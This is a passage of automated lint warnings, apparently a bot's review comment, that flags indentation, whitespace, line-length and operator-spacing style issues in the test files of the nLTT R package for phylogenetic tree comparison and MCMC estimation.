tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:88:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                       ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                                            ^~\n```\n[tests/testthat/test_calculate_weight.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_mcmc_nltt.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tset.seed(1) #just to be safe\n^\n```\n[tests/testthat/test_mcmc_nltt.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:11:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:7:35:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:43:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:50:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:68:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:11:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:8:35:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:43:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:50:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:61:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:68:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:9:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:10:15:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tLL_BD <- function(params, phy) {\n             ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:21:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                   ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:63:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                                                             ~^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:12:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:12:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_mcmc_nltt.R:13:3:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:13:24:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_mcmc_nltt.R:14:24:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n                      ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:15:28:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L15) *style:* **Put spaces around all infix operators.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n                          ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#calculate Maximum Likelihood estimates\n^\n```\n[tests/testthat/test_mcmc_nltt.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt(q,LL_BD,c(1,0.0),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#these should match our MCMC results\n^\n```\n[tests/testthat/test_mcmc_nltt.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"Cannot propose new value for a parameter with value 0.0.\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tML1 <- DDD::bd_ML(p[[1]])\n^\n```\n[tests/testthat/test_mcmc_nltt.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tML2 <- DDD::bd_ML(q[[1]])\n^\n```\n[tests/testthat/test_mcmc_nltt.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:20:13:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\tML1 <- DDD::bd_ML(p[[1]])\n           ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tmcmc_nltt(42,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:21:13:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\tML2 <- DDD::bd_ML(q[[1]])\n           ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: phy must be of class 'phylo'\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tML1[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.001\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L24) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcolMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:24:77:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:90:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                        ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:24:104:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcolMeans(mcmc_nltt(p,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n                                                                                                      ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tv <- mcmc_nltt(p,LL_BD,c(1,-1),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5),\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\"mcmc_nltt: initial parameter values have to be above zero\"\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcolMeans(mcmc_nltt(q,LL_BD,c(1,0.01),c(TRUE,TRUE),iterations=10000,burnin=1000,thinning=1,sigma=0.5))[[1]],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:28:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/924817fada41948af9f33fb1581de73076fe23bc/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never 